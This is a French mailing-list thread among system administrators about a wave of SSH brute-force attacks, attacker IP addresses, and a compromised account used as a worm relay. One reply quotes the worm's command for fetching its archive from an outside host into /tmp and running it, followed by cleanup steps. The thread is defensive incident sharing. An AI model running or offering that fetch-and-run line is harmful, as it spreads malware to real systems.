Re: Attaques SSH

Top Page

Reply to this message
Author: P. Dumontroty
Date:  
To: smorico, guilde
Subject: Re: Attaques SSH
On vient d'identifier un de nos compte utilisateur qui sert de relais
pour un ver.
Une fois la connexion faite sur le compte, il télécharge (wget
peace.110mb.com/zH.tar.gz) le ver dans /tmp et le lance en répétition
(./screen -r).

Le Pb est réglé chez nous.

Pour le trouver:
    - verifier si les répertoires /tmp/zH  et /tmp/uscreens existent.
    - suprimer le compte passerel
    - tuer les process .SCREEN,.... (pour les trouver: lsof | grep <le 
compte> ou lsof | grep zH)


J'espère que ça va se calmer ?



smorico wrote:
> > leur nombre est passé de «quelques unes» à une centaine par semaine.
> > Avez vous constaté la même chose ?
>
> oui les attaques semblent s'intensifier ces derniers temps
>
> J'allais parler de bot chinois.. enfin taïwanais, mais la 1ere adresse
> IP est visiblement d'origine Russe.. (ptspb.ru, -replay.ru) !
>
> Ce n'est peu-être pas sans liens avec les attaques Russie/Estonie
> et/ou Chine/France...
>
> Il y a de fortes chance pour que les IPs changent de toute façon...
>
> Niveau poste de travail aussi.. Les "troyan" windows (botnet) semblent
> avoir monté d'un cran niveau complexité... (Invisibilité des process,
> peu de consommation CPU/mémoire..)
>
> http://www.google.fr/search?hl=fr&q=serveur+chine+france&btnG=Rechercher&meta=
>
> http://www.google.fr/search?hl=fr&q=affaire+russie+estonie&btnG=Recherche+Google&meta=
>
> http://www.google.fr/search?hl=fr&q=attaque+russie+estonie&btnG=Rechercher&meta=
>
> ??
>
> En tout cas après les violentes attaques de ces derniers mois, il me
> semble important de garder un oeil grand ouvert sur la sécurité des
> ordinateurs personnels, professionnels, ou supercalculateurs
> d'universités et centres de recherche...
>
> Il y a certainement plus d'infos ici
> http://honeynet.thalix.com/index.html
>
> (Je reste intéressé par l'avis du RENATER concernant l'origine de ces
> attaques..)
>
> Bon courage à vous en tout cas
>
> Cordialement,
>
> P. Dumontroty a écrit :
>> attaque massive depuis mercredi dernier.
>> En gros 2 tentative de login/sec pendant ~10heures.
>
>
>> Nous sommes en contact avec RENATER pour filtrer les machines.
>
>> Les adresse qui nous attaques: 78.111.80.227
>>                                                  218.151.85.233
>>                                                  66.36.243.231

>
>>>>>> depuis une semaine environ mon serveur subit des attaques sur
>>>>>> SSH, leur
>>>>>> nombre est passé de «quelques unes» à une centaine par semaine.
>
>